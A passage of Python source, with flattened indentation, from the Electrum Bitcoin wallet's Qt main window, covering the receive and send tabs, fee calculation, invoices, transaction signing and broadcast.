self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', 3600)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('On-chain'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=230)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_requests_label = QLabel(_('Incoming payments'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox_r = QHBoxLayout()
hbox_r.addWidget(self.receive_qr)
hbox_r.addWidget(self.receive_address_e)
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addLayout(hbox_r)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_request(self, key):
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', 3600)
if is_lightning:
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
self.address_list.update()
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
def create_bitcoin_request(self, amount, message, expiration):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, title, content):
self.app.clipboard().setText(content)
self.show_message(_("{} copied to clipboard").format(title))
#QToolTip.showText(QCursor.pos(), _("{} copied to clipboard").format(title), self.parent)
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def clear_receive_tab(self):
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
def update_receive_qr(self):
uri = str(self.receive_address_e.text())
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
# note: 'addr' could be ln invoice or BIP21 URI
try:
uri = util.parse_URI(addr)
except InvalidBitcoinURI:
pass
else:
addr = uri.get('address')
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(self.amount_e.width())
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 3, 4)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 4, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 4, 1, 1, -1)
self.set_pay_from([])
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
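        # Fee slider callback: persist the chosen setting (mempool depth level, ETA-based fee
        # level, or a static fee/kB), refresh the displayed feerate, and recompute the fee
        # or the max-spend amount.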
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
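        # Keep the absolute-fee and feerate fields mutually exclusive: whichever one was edited
        # last becomes the frozen setting, the slider is deactivated, and the fee is recomputed.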
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
self.feecontrol_fields = QWidget()
vbox_feecontrol = QVBoxLayout(self.feecontrol_fields)
vbox_feecontrol.setContentsMargins(0, 0, 0, 0)
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addWidget(self.feecontrol_fields, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_button)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
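        # Any manual edit of the amount (BTC or fiat) cancels 'Max' mode.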
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
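        # Color-code the amount/fee/feerate fields: red when funds are insufficient (with a
        # status-bar message that also reports any frozen balance), blue for auto-filled values.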
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.set_onchain(False)
self.invoices_label = QLabel(_('Outgoing payments'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
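    # If no recipient has been entered yet, fall back to one of the wallet's own addresses
    # so that a fee can still be estimated.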
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
if not self.is_onchain:
return
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs = self.read_outputs()
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
                # fall back to the actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
                # fall back to the actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
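        # In 'Max' mode, write the actual spendable amount (minus any plugin-added extra fee)
        # back into the amount field.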
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + '\t' + "%s"%x.get('address') + '\t'
for coin in self.pay_from:
item = QTreeWidgetItem([format(coin), self.format_amount(coin['value'])])
item.setFont(0, QFont(MONOSPACE_FONT))
self.from_list.addTopLevelItem(item)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
        '''Password request wrapper. The password is passed to the function
        as the 'password' named argument. "None" indicates an unencrypted
        wallet; if the user cancels the password request, the wrapped
        function is not called at all. An empty input is passed as the
        empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
@protected
def protect(self, func, args, password):
return func(*args, password)
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
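    # Returns a fixed fee in satoshis when the fee field is frozen, a callable estimator derived
    # from the frozen feerate, or None to let the wallet use the configured estimator.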
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_outputs(self):
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") + f"{err.idx+1}: {err.line_content[:40]}... ({repr(err.exc)})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
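    # Lightning payments run on the wallet's worker thread so the GUI stays responsive.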
def pay_lightning_invoice(self, invoice):
amount_sat = self.amount_e.get_amount()
attempts = LN_NUM_PAYMENT_ATTEMPTS
def task():
try:
self.wallet.lnworker.pay(invoice, amount_sat, attempts)
except Exception as e:
self.show_error(str(e))
self.do_clear()
self.wallet.thread.add(task)
self.invoice_list.update()
def on_request_status(self, key, status):
if key not in self.wallet.requests:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
def on_invoice_status(self, key, status, log):
if key not in self.wallet.invoices:
return
self.invoice_list.update_item(key, status, log)
if status == PR_PAID:
self.show_message(_('Payment succeeded'))
self.need_update.set()
elif status == PR_FAILED:
self.show_error(_('Payment failed'))
else:
pass
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self.is_onchain:
invoice = self.payto_e.lightning_invoice
if not invoice:
return
if not self.wallet.lnworker:
self.show_error(_('Lightning is disabled'))
return
return self.wallet.lnworker.parse_bech32_invoice(invoice)
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(outputs, message, self.payment_request, self.payto_URI)
def do_save_invoice(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.do_clear()
self.invoice_list.update()
def do_preview(self):
self.do_pay(preview=True)
def do_pay(self, preview=False):
invoice = self.read_invoice()
if not invoice:
return
if not preview:
self.wallet.save_invoice(invoice)
self.do_clear()
self.invoice_list.update()
self.do_pay_invoice(invoice, preview)
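    # Dispatch on invoice type: Lightning invoices go to lnworker; on-chain invoices are built
    # into an unsigned transaction, checked against the relay fee, optionally previewed, then
    # confirmed, signed and broadcast.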
def do_pay_invoice(self, invoice, preview=False):
if invoice['type'] == PR_TYPE_LN:
self.pay_lightning_invoice(invoice['invoice'])
return
elif invoice['type'] == PR_TYPE_ONCHAIN:
message = invoice['message']
outputs = invoice['outputs']
else:
raise Exception('unknown invoice type')
if run_hook('abort_send', self):
return
outputs = [TxOutput(*x) for x in outputs]
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x: x.value, outputs))
fee = tx.get_fee()
use_rbf = bool(self.config.get('use_rbf', True))
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, message)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, message)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
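    # Broadcasting happens off the GUI thread; for BIP70 payment requests a payment ACK is also
    # sent to the merchant after a successful broadcast.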
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
key = pr.get_id()
#self.wallet.set_invoice_paid(key, tx.txid())
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
